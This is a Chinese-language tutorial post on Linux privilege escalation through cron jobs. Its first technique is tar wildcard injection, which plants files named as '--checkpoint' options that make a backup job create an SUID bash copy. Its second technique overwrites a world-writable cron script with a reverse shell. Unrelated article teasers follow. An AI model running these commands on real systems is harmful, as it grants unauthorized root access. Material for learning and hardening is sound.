Linux提權--定時任務--打包配合 SUID(本地)文件權限配置不當(WEB+本地)

免責聲明:本文僅做技術交流與學習...

目錄

定時任務 打包配合 SUID-本地

原理:

背景:

操作演示:

分析:

實戰發現:

定時任務 文件權限配置不當-WEB&本地

操作演示:


定時任務 打包配合 SUID-本地

原理:

提權通過獲取計劃任務執行文件信息進行提權 .

1、相對路徑和絕對路徑執行

2、計劃任務命令存在參數調用

利用計劃任務的備份功能 tar 命令的參數利用 .

(大部分為本地提權)

背景:

定時任務-->
背景:
運維為了防止數據丟失等,寫個定時任務進行數據的打包壓縮.
由于數據打包壓縮tar命令.
tar可以嘗試加參數調用其他命令執行
cd /tmp;tar czf /tmp/backup.tar.gz*
來到tmp目錄壓縮成backup.tar.gz(當前所有)

--(網站和數據庫經常進行備份,tar壓縮---隔段時間進行打包.)

操作演示:

#tar--checkpoint=1調用其他命令執行
echo "" > --checkpoint=1  
echo "" > "--checkpoint-action=exec=sh test.sh"  
echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > test.sh  
chmod +x test.sh 
#創建好文件之后把定時任務開起來.

---文件弄好之后,把定時任務開起來--->

--等待定時任務的運行(打包)

-->得到壓縮文件和一個bash文件(test.sh沒有運行.)

./bash 命令怎么執行呢??? 多加個 -p 參數.

./bash -p

分析:

實戰發現:

查看定時任務有沒有可利用(tar打包壓縮).


定時任務 文件權限配置不當-WEB&本地

--就是權限配置不當,其他的低權限可以調用,執行等等.

利用不安全的權限分配操作導致的定時文件覆蓋

chmod 777 775 等 所有者 組 其他成員說明

操作演示:

--定時任務里添加vim /etc/crontab111.sh < ps(或反彈命令)./111/sh? 發現沒權限執行 ---chmod +x后才可以.(因為需要權限啊,)

所以:

如果root用戶給文件 777 的權限,那么其他用戶和組都能動他了.

改完之后,(寫個反彈命令)

--當文件被計劃任務調用的時候就上線了.

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/10885.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/10885.shtml
英文地址,請注明出處:http://en.pswp.cn/web/10885.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Rust中忽略JSON反序列化時的不必要字段

在Rust中處理JSON數據時&#xff0c;經常會遇到JSON數據中包含一些在目標數據結構中不存在的字段的情況。如果你使用的是serde和serde_json這兩個流行的庫來處理JSON&#xff0c;那么有一些簡單的方法可以忽略這些不必要的字段。 默認行為&#xff1a;忽略未知字段 在Rust中&…

人工智能專業(科普)

Ⅰ 簡介 人工智能&#xff08;Artificial Intelligence&#xff09;是中國普通高等學校本科專業。人工智能&#xff0c;是一個以計算機科學為基礎&#xff0c;由計算機、心理學、哲學等多學科交叉融合的交叉學科、新興學科&#xff0c;研究、開發用于模擬、延伸和擴展人的智能…

在vue3中,如何優雅的使用echarts之實現大屏項目

前置知識 效果圖 使用技術 Vue3 Echarts Gasp Gasp&#xff1a;是一個 JavaScript動畫庫,它支持快速開發高性能的 Web 動畫。在本項目中&#xff0c;主要是用于做軌跡運動 所需安裝的插件 npm i echarts npm i countup.js 數字滾動特效 npm i gsap javascript動畫庫 np…

MogDBopenGauss查詢重寫規則lazyagg

在MogDB&openGauss中&#xff0c;參數rewrite_rule用于控制查詢重寫&#xff0c;本文介紹查詢重寫規則lazyagg 在未設置rewrite_rulelazyagg的情況下&#xff0c;子查詢中有GROUP BY會先進行GROUP BY lazyagg表示延遲聚合運算&#xff0c;目的是消除子查詢中的聚合運算&…

寶塔面板怎么解決nginx跨域問題

1.找到寶塔的nginx配置文件 寶塔有一點不同&#xff0c;nginx配置文件不在nginx的安裝目錄中&#xff0c;應當去/www/server/panel/vhost/nginx找到 2.添加你要跨域的地址 location /api {proxy_pass http://localhost:8080;proxy_set_header Host $host;proxy_set_header X-…

維護祖傳項目Tomcat部署war包

文章目錄 1. 安裝tomcat2. 解決Tomcat啟動日志亂碼3. idea配置啟動war包 1. 安裝tomcat 選擇免安裝版本&#xff0c;只需要在系統變量里面配置一下。 新增系統變量 CATALINA_HOME D:\Users\common\tomcat\apache-tomcat-8.5.97-windows-x64\apache-tomcat-8.5.97 編輯追加Path…

FPGA SDRAM讀寫控制器

感謝鄧堪文大佬 &#xff01; SDRAM 同步動態隨機存取內存&#xff08;synchronousdynamic randon-access menory&#xff0c;簡稱SDRAM&#xff09;是有一個同步接口的動態隨機存取內存&#xff08;DRAM&#xff09;。通常DRAM是有一個異步接口的&#xff0c;這樣它可以隨時響…

Node.js基礎:從入門到實戰

初識 Node.js 與內置模塊 &#xff08;初識&#xff09; 1、知道什么是node.js 2、知道node.js可以做什么 3、node.js 中js的組成部分 &#xff08;內置模塊&#xff09; 4、用 fs 模塊讀寫操作文件 5、使用 path 模塊處理路徑 6、使用http 模塊寫一個基本的web服務器 初識 N…

第1章 信息系統綜合知識 1.4 IT戰略

第1章 信息系統綜合知識 1.4 IT戰略 1.4.1 IT戰略的內涵 IT戰略&#xff0c;是在診斷和評估企業信息化現狀的基礎上&#xff0c;制定和調整企業信息化的指導綱領&#xff0c;爭取企業以最合適的成本&#xff0c;去做最合適的信息化工作。 IT戰略制定步驟: 定方向:明確遠景…

設計模式——模板設計模式(Template Method)

模板設計-base 什么是模板&#xff1f; 舉個簡單的例子&#xff0c;以AABB的格式&#xff0c;寫出一個詞語&#xff0c;你可能會想到&#xff0c;明明白白&#xff0c;干干凈凈等&#xff0c; 這個AABB就是一個模板&#xff0c;對模板心中有了一個清晰的概念之后&#xff0c;…

docker————docker的安裝

目錄 docker的安裝 1、安裝yum-utils工具 2、安裝yum倉庫 3、安裝docker引擎 4、設置開機啟動&#xff0c;并立即啟動 5、測試 docker的安裝 docker的官網Docker Docs 我才用的linux版本是rocky&#xff0c;使用的是最小安裝 1、安裝yum-utils工具 [rootbogon yum.rep…

環境變量(全)

概念 環境變量(environment variables)一般是指在操作系統中用來指定操作系統運行環境的一些參數 如&#xff1a;我們在編寫C/C代碼的時候&#xff0c;在鏈接的時候&#xff0c;從來不知道我們的所鏈接的動態靜態庫在哪里&#xff0c;但是照樣可以鏈接成功&#xff0c;生成可執…

今日arXiv最熱NLP大模型論文:揭露大語言模型短板,北京大學提出事件推理測試基準

人工智能領域又一里程碑時刻&#xff01;北京大學、北京智源人工智能研究院等機構聯合推出大型事件推理評測基準 。這是首個同時在知識和推理層面全面評估大模型事件推理能力的數據集。 總所周知&#xff0c;事件推理需要豐富的事件知識和強大的推理能力&#xff0c;涉及多種推…

consul啟動Error_server_rejoin_age_max (168h0m0s) - consider wiping your data dir

consul 啟動報錯&#xff1a; consul[11880]: 2024-05-12T08:37:51.095-0400 [ERROR] agent: startup error: error"refusing to rejoin cluster because server has been offline for more than the configured server_rejoin_age_max (168h0m0s) - consider wiping you…

【GD32】02-ADC模擬數字轉換器

ADC 在電子和通信技術中&#xff0c;ADC&#xff08;模擬數字轉換器&#xff09;是一種將模擬信號轉換為數字信號的電子設備。這種轉換是電子系統中非常關鍵的一個環節&#xff0c;因為數字信號更易于處理、存儲和傳輸。ADC的工作原理通常包括采樣、保持、量化和編碼等步驟。采…

http協議 tomcat如何訪問資源 servlet理論介紹

tomcat介紹 bin是啟動命令&#xff1b; conf是配置&#xff0c;可以修改端口號&#xff1b; lib是依賴的jar包&#xff1b; logs是日志 webapps是重點&#xff0c;在這里新建我們自己的javaWeb項目 tomcat如何訪問資源 tomcat通過統一資源定位符&#xff08;URL&#xff09;來…

鄉村振興與農村基礎設施建設:加大農村基礎設施建設投入,提升農村公共服務水平,改善農民生產生活條件,構建宜居宜業的美麗鄉村

一、引言 鄉村振興是我國現代化進程中的重要戰略&#xff0c;而農村基礎設施建設則是鄉村振興的基石。隨著城市化進程的加快&#xff0c;農村基礎設施建設滯后的問題日益凸顯&#xff0c;成為制約鄉村發展的瓶頸。因此&#xff0c;加大農村基礎設施建設投入&#xff0c;提升農…

打造一套在線教育系統,如何在教育這個慢行業打造品牌?

品牌對于教育行業非常重要&#xff0c;很多從事教育行業的朋友一直想塑造屬于自己的品牌形象&#xff0c;但做起來卻沒那么容易。因為教育行業相對來說是一個慢行業&#xff0c;用戶必須看到效果才會認可&#xff0c;而教育的效果往往需要經過長期的學習才能看到。 我覺得&…

AI大模型探索之路-訓練篇21:Llama2微調實戰-LoRA技術微調步驟詳解

系列篇章&#x1f4a5; AI大模型探索之路-訓練篇1&#xff1a;大語言模型微調基礎認知 AI大模型探索之路-訓練篇2&#xff1a;大語言模型預訓練基礎認知 AI大模型探索之路-訓練篇3&#xff1a;大語言模型全景解讀 AI大模型探索之路-訓練篇4&#xff1a;大語言模型訓練數據集概…

華為OD機試 - 執行任務賺積分 - 動態規劃(Java 2024 C卷 100分)

華為OD機試 2024C卷題庫瘋狂收錄中,刷題點這里 專欄導讀 本專欄收錄于《華為OD機試(JAVA)真題(A卷+B卷+C卷)》。 刷的越多,抽中的概率越大,每一題都有詳細的答題思路、詳細的代碼注釋、樣例測試,發現新題目,隨時更新,全天CSDN在線答疑。 一、題目描述 現有 N 個任…